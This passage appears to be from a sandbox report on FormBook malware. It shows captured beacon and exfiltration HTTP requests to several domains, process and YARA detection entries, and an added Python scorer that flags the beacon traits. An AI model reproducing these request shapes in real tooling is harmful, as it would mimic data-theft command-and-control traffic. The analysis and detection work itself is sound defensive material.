                                                                                                                    Data Ascii: Qzj=6znhTvCysq/1eDp5cKepZtWpMMsXt2CE7t+lx3zGFyb19FtjbmZkBYMPSMOR0opcfEn8bpaFplFv6Q24WOwU6wqiJbuVgNZk9njrkygI7Pcg9WS0xOB8Aew6EfltqPu4cTCEQOHXqdtM+zFEH2YbdJ/h7HY5foMr6tzItgG9qp7UXV7sRgy1QcqTdbf819RGvepFf/fzl1rqt4yfaZNP3/U=


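Sessions 39 to 42 show the same beacon shape on two different domains: a request to a four-character directory (/kgyd/, /qwed/), a single short parameter name (Qzj, Znyl) carrying an opaque base64 blob either in the query string or in a form-encoded body, an iPhone Safari User-Agent sent by a process the report lists as a Windows executable, Origin and Referer pointing back at the target itself, and a 10300-byte POST following a 200-byte one. The Python below is an added example, not part of the Joe Sandbox report or of any FormBook signature set: it parses raw HTTP/1.1 requests, scores each of those traits, and runs the scorer over request text transcribed from sessions 40 and 41 plus one constructed benign request. The regexes, the 8192-byte "large body" cutoff and the `min_hits` threshold are assumptions chosen for this illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict[str, str] = field(default_factory=dict)
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


# Heuristics derived from the sessions in this report. The patterns and cutoffs
# are assumptions for this example, not a published FormBook signature.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")      # /kgyd/, /qwed/
PARAM_KEY_RE = re.compile(r"^[A-Za-z0-9]{2,6}$")   # Qzj, Znyl
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
LARGE_BODY = 8192                                  # the report's 10300-byte POSTs exceed this


def score_formbook_beacon(req: HttpRequest) -> list[str]:
    """Return the beacon traits a request exhibits; an empty list means nothing matched."""
    hits: list[str] = []
    url = urlsplit(req.target)
    host = req.headers.get("host", "")

    if SHORT_DIR_RE.match(url.path):
        hits.append("short 4-char directory path")
    if req.headers.get("origin") == f"http://{host}":
        hits.append("origin equals host")
    if req.headers.get("referer") == f"http://{host}{url.path}":
        hits.append("referer is the posted path itself")
    if "iphone" in req.headers.get("user-agent", "").lower():
        hits.append("mobile user-agent (report attributes the session to a Windows process)")

    # parse_qsl turns '+' into ' '; restore it before checking the base64 alphabet.
    query = req.body if req.method == "POST" else url.query
    params = [(k, v.replace(" ", "+")) for k, v in parse_qsl(query, keep_blank_values=True)]
    if params and all(PARAM_KEY_RE.match(k) and BASE64_RE.match(v) for k, v in params):
        hits.append("every parameter is a short key with an opaque base64 blob")

    length = req.headers.get("content-length", "0")
    if length.isdigit() and int(length) > LARGE_BODY:
        hits.append("large POST body (possible exfiltration)")
    return hits


def is_formbook_like(raw: str, min_hits: int = 3) -> bool:
    """Verdict helper: three or more traits on one request is treated as a beacon."""
    return len(score_formbook_beacon(parse_request(raw))) >= min_hits


# Sample requests transcribed from sessions 41 and 40 above; the benign one is constructed.
SAMPLE_POST = (
    "POST /qwed/ HTTP/1.1\r\n"
    "Host: www.lunch.delivery\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Origin: http://www.lunch.delivery\r\n"
    "Connection: close\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 200\r\n"
    "Referer: http://www.lunch.delivery/qwed/\r\n"
    "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 "
    "(KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\r\n"
    "\r\n"
    "Qzj=6znhTvCysq/1dgh5btKpINWqScsXjWCA7q2lx1fsGEL18l9jJVBkM4MPZsOU6IpHfEaDbrOFplRv6RG4W9oV"
    "6gqgSLuTutZk9njrky0m7Msg9mC0ws5/cOw9U/lthvu8cTDhQLn9qYpM+y1EHkwaT5/n/HZlP6dR95qdiTeElIK0"
    "STq2ARTiCcOgAcWI4+sP0Q=="
)
SAMPLE_GET = (
    "GET /kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw"
    "88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= HTTP/1.1\r\n"
    "Host: www.myrideguy.net\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 "
    "(KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\r\n"
    "\r\n"
)
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("POST", SAMPLE_POST), ("GET", SAMPLE_GET), ("benign", BENIGN_GET)):
        print(name, is_formbook_like(raw), score_formbook_beacon(parse_request(raw)))
```

The scorer works on a single request so it can sit behind a proxy log or a Suricata HTTP event feed; the strongest single signal in these sessions is the User-Agent mismatch, since the report's PID/Process column ties every session to a Windows binary, so a deployment with process context should weight that trait higher than the path or parameter shape.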
Session ID: 43 | Source: 192.168.2.4:50045 | Destination: 13.248.169.48:80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:09:43.998207092 CEST | 10903 | OUT | POST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj= [TRUNCATED]


Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 50046 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:09:46.543308020 CEST | Bytes transferred: 533 | Direction: OUT | Data:
GET /qwed/?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB HTTP/1.1
Host: www.lunch.delivery
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Timestamp: Oct 24, 2024 05:09:47.209832907 CEST | Bytes transferred: 391 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 24 Oct 2024 03:09:47 GMT
Content-Type: text/html
Content-Length: 251
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB"}</script></head></html>


Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 50047 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:09:52.287062883 CEST | Bytes transferred: 810 | Direction: OUT | Data:
POST /te6q/ HTTP/1.1
Host: www.allinathletes.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.allinathletes.biz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.allinathletes.biz/te6q/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=MgQcHRS9SkrlMZF/Z7N5MZ1gT+uVpKIu7BgaZop+ioWCKa0UgUKeil+aeFWz96fJPxvQGU4glDo0KPA5yak4OVm8WNDUdrpRFtz/qvS/xmAINIdaZIlgf0OGaNcg8k6mb7ZomXmyQiE4U4hVJWO1r47+f2lVIlYswCYHounx03+I3p5wZibrbb98OfrcZXlIJA==


Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 50048 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:09:54.836038113 CEST | Bytes transferred: 830 | Direction: OUT | Data:
POST /te6q/ HTTP/1.1
Host: www.allinathletes.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.allinathletes.biz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.allinathletes.biz/te6q/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=MgQcHRS9SkrlN51/W4l5EZ1nPuuVgqIq7BsaZpc7i++CK7EUyB+ehl+aUlX5gKf0PxryGUEglD80KPQ5ypM7OFm+D9DWTLpRFtz/qvHaxmIIM4taatFnWUOJQtcg4k7tb7ZKmW7dQkI4U6pVKHO2i478SWk8CEAl1yZQiPf9qzKo7PoqIT68JbZPTYioUUYBSAEX/EHb66EvnC8+G7fgw/M=


Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 50049 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:09:57.459743977 CEST | Bytes transferred: 10912 | Direction: OUT | Data:
POST /te6q/ HTTP/1.1
Host: www.allinathletes.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.allinathletes.biz
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.allinathletes.biz/te6q/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj= [TRUNCATED]


Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:10:00.182157040 CEST | Bytes transferred: 536 | Direction: OUT | Data:
GET /te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB HTTP/1.1
Host: www.allinathletes.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Timestamp: Oct 24, 2024 05:10:00.777281046 CEST | Bytes transferred: 391 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 24 Oct 2024 03:10:00 GMT
Content-Type: text/html
Content-Length: 251
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB"}</script></head></html>


Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 50051 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:10:05.831948042 CEST | Bytes transferred: 816 | Direction: OUT | Data:
POST /el3s/ HTTP/1.1
Host: www.barbequecritics.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.barbequecritics.com
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.barbequecritics.com/el3s/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=3RyXe2NSbX/TJmSj/KeU7JtyG6+IR9caTivxMhXPVUlpaNgKj5JeQGcpBZHzEPmmerSPxYGjVk4LWtMIiFXbydbQkpTy+VaDjagJAhvXzEQjmG55qRl1jF0zbz3XGogKrk3nWccCEIwCv+BbBEZjwqorvn/RF9KTdn3Wrhs8CYDSo+gXeMD1XHBoDsJteoquIA==


Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 50052 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:10:08.375042915 CEST | Bytes transferred: 836 | Direction: OUT | Data:
POST /el3s/ HTTP/1.1
Host: www.barbequecritics.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.barbequecritics.com
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.barbequecritics.com/el3s/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Data Ascii: Qzj=3RyXe2NSbX/TIFaj+pGU5pt1D6+IHNceTijxMgTlVh1pfcQKi89eXGcpK5H2Kvm9equ9xcGjVlYLWt8Ii0XczNbW8ZT09laDjagJAh79zEIjn2J5rwl6/V0sST3XNIgGrk3/WdQ7ELECv6NbQ1Zg+qotw3+DDo3LUFOL2QM/IYXRkYxNP9iiFHlberAZTrXnTFCaMJXdp/ajPrIZLUrbM9Y=


Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 50053 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp: Oct 24, 2024 05:10:10.928344011 CEST | Bytes transferred: 10918 | Direction: OUT | Data:
POST /el3s/ HTTP/1.1
Host: www.barbequecritics.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.barbequecritics.com
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.barbequecritics.com/el3s/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 49 46 61 6a 2b 70 47 55 35 70 74 31 44 36 2b 49 48 4e 63 65 54 69 6a 78 4d 67 54 6c 56 68 39 70 44 2b 59 4b 69 66 56 65 57 47 63 70 57 70 48 33 4b 76 6e 76 65 72 47 35 78 63 44 65 56 67 63 4c 57 50 30 49 6b 41 6a 63 38 4e 62 57 31 35 54 78 2b 56 61 57 6a 5a 59 57 41 68 72 39 7a 45 49 6a 6e 31 52 35 37 52 6c 36 39 56 30 7a 62 7a 32 59 47 6f 67 69 72 6b 2f 76 57 64 55 30 45 39 30 43 76 61 64 62 53 6e 68 67 79 71 6f 76 7a 33 2f 47 44 6f 7a 71 55 46 53 48 32 51 35 61 49 61 4c 52 33 76 63 73 4c 2b 36 74 57 6d 49 46 45 5a 51 70 56 38 33 43 4c 6d 43 52 4d 4b 44 78 31 38 6d 4b 55 49 74 4c 66 6c 43 65 51 62 62 51 38 47 73 2f 4d 38 2f 6f 53 56 54 74 6f 51 5a 4d 51 6c 69 45 41 68 47 63 51 42 5a 2b 59 4a 34 65 69 4c 34 63 6d 79 55 52 44 4c 6e 7a 31 2b 56 49 47 62 6d 51 76 61 34 53 4c 77 31 32 37 38 5a 77 4a 61 46 6a 59 57 53 46 30 78 79 39 71 62 64 59 65 70 6d 78 61 34 30 7a 41 6a 62 6e 59 6b 54 44 66 50 6f 61 52 64 79 6c 4d 6a 74 35 49 46 37 70 57 46 67 34 33 45 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=… [TRUNCATED]


                                                                                                                    Session ID:52
                                                                                                                    Source IP:192.168.2.4
                                                                                                                    Source Port:50054
                                                                                                                    Destination IP:3.33.130.190
                                                                                                                    Destination Port:80
                                                                                                                    Timestamp:Oct 24, 2024 05:10:13.824707031 CEST
                                                                                                                    Bytes transferred:538
                                                                                                                    Direction:OUT
                                                                                                                    Data:GET /el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.barbequecritics.com
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Timestamp:Oct 24, 2024 05:10:14.590037107 CEST
                                                                                                                    Bytes transferred:391
                                                                                                                    Direction:IN
                                                                                                                    Data:HTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:10:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 36 54 61 33 64 43 31 53 62 46 65 78 4c 47 61 41 79 4b 2f 58 72 72 46 38 44 4a 6e 68 42 38 59 4c 57 6d 2f 30 4f 7a 58 45 62 58 4e 47 42 71 59 57 37 73 42 6e 53 47 49 57 41 71 54 32 46 4e 57 65 62 4c 69 5a 2b 59 61 43 61 6c 6f 61 52 5a 4d 6b 69 57 48 4c 33 6f 75 4c 37 5a 54 51 6b 31 4f 6a 73 4a 73 48 44 68 44 69 2b 57 34 6f 69 32 46 44 71 68 34 47 6b 30 4d 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Target ID:0
                                                                                                                    Start time:23:06:05
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'326'841 bytes
                                                                                                                    MD5 hash:0B14AB0AC2F8E44D3F3CFD8FCDBE6D30
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:23:06:06
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
                                                                                                                    Imagebase:0xff0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:23:06:43
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe"
                                                                                                                    Imagebase:0x200000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:6
                                                                                                                    Start time:23:06:45
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\write.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                                                                    Imagebase:0x330000
                                                                                                                    File size:10'240 bytes
                                                                                                                    MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:7
                                                                                                                    Start time:23:06:58
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe"
                                                                                                                    Imagebase:0x200000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
